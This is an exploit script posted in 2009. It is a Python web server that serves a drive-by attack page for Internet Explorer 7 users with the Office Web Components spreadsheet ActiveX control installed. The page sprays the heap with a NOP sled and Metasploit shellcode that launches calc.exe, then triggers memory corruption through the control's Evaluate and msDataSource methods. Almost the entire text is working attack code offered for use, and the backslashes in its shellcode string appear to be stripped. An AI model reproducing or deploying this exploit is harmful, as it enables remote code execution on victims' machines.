msofficeweb-activex.txt
Posted on 21 July 2009
# # Author : Ahmed Obied (ahmed.obied@gmail.com) # # - Based on the code posted at http://www.milw0rm.com/exploits/9163 # - Tested using: # > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc10.dll installed # > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc11.dll installed # # Usage : python ie_owc.py [port (between 1024 and 65535)] # import sys import socket from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler class RequestHandler(BaseHTTPRequestHandler): def convert_to_utf16(self, payload): # From Beta v2.0 by Berend-Jan Wever # http://www.milw0rm.com/exploits/656 enc_payload = '' for i in range(0, len(payload), 2): num = 0 for j in range(0, 2): num += (ord(payload[i + j]) & 0xff) << (j * 8) enc_payload += '%%u%04x' % num return enc_payload def get_payload(self): # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub # http://metasploit.com payload = 'x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73' payload += 'x13x6fx02xb1x0ex83xebxfcxe2xf4x93xeaxf5x0e' payload += 'x6fx02x3ax4bx53x89xcdx0bx17x03x5ex85x20x1a' payload += 'x3ax51x4fx03x5ax47xe4x36x3ax0fx81x33x71x97' payload += 'xc3x86x71x7ax68xc3x7bx03x6exc0x5axfax54x56' payload += 'x95x0ax1axe7x3ax51x4bx03x5ax68xe4x0exfax85' payload += 'x30x1exb0xe5xe4x1ex3ax0fx84x8bxedx2ax6bxc1' payload += 'x80xcex0bx89xf1x3exeaxc2xc9x02xe4x42xbdx85' payload += 'x1fx1ex1cx85x07x0ax5ax07xe4x82x01x0ex6fx02' payload += 'x3ax66x53x5dx80xf8x0fx54x38xf6xecxc2xcax5e' payload += 'x07x7cx69xecx1cx6ax29xf0xe5x0cxe6xf1x88x61' payload += 'xd0x62x0cx2cxd4x76x0ax02xb1x0e' return self.convert_to_utf16(payload) def get_exploit(self): exploit = ''' function spray_heap() { var chunk_size, payload, nopsled; chunk_size = 0x100000; payload = unescape("<PAYLOAD>"); nopsled = unescape("<NOP>"); while (nopsled.length < chunk_size) nopsled += nopsled; nopsled_len = chunk_size - (payload.length + 20); nopsled = nopsled.substring(0, nopsled_len); heap_chunks = new Array(); for (var i = 0 ; i < <CHUNKS> ; i++) heap_chunks[i] = nopsled + payload; } function trigger_bug() { var obj, arr; try { obj = new ActiveXObject("OWC10.Spreadsheet"); } catch (err) { try { obj = new ActiveXObject("OWC11.Spreadsheet"); } catch (err) { window.location = 'about:blank'; } } arr = new Array(); arr.push(1); arr.push(2); arr.push(0); arr.push(window); for (var i = 0 ; i < arr.length ; i++) { for (var j = 0 ; j < 10 ; j++) { try { obj.Evaluate(arr[i]); } catch (err) {} } } window.status = arr[3] + ""; for (var j = 0 ; j < 10 ; j++) { try { obj.msDataSource(arr[3]); } catch (err) {} } } spray_heap(); trigger_bug(); ''' exploit = exploit.replace('<PAYLOAD>', self.get_payload()) exploit = exploit.replace('<NOP>', '%u0b0c%u0b0c') exploit = exploit.replace('<CHUNKS>', '100') exploit = '<html><body><script>' + exploit + '</script></body></html>' return exploit def log_request(self, *args, **kwargs): pass def do_GET(self): try: if self.path == '/': print print '[-] Incoming connection from %s' % self.client_address[0] self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() print '[-] Sending exploit to %s ...' % self.client_address[0] self.wfile.write(self.get_exploit()) print '[-] Exploit sent to %s' % self.client_address[0] except: print '[*] Error : an error has occured while serving the HTTP request' exit_program() def exit_program(): print '[-] Exiting ...' sys.exit(0) def main(): if len(sys.argv) != 2: print 'Usage: %s [port (between 1024 and 65535)]' % sys.argv[0] sys.exit(0) try: port = int(sys.argv[1]) if port < 1024 or port > 65535: raise ValueError try: serv = HTTPServer(('', port), RequestHandler) ip = socket.gethostbyname(socket.gethostname()) print '[-] Web server is running at http://%s:%d/' % (ip, port) try: serv.serve_forever() except: exit_program() except socket.error: print '[*] Error : a socket error has occurred' exit_program() except ValueError: print '[*] Error : an invalid port number was given' exit_program() if __name__ == '__main__': main()
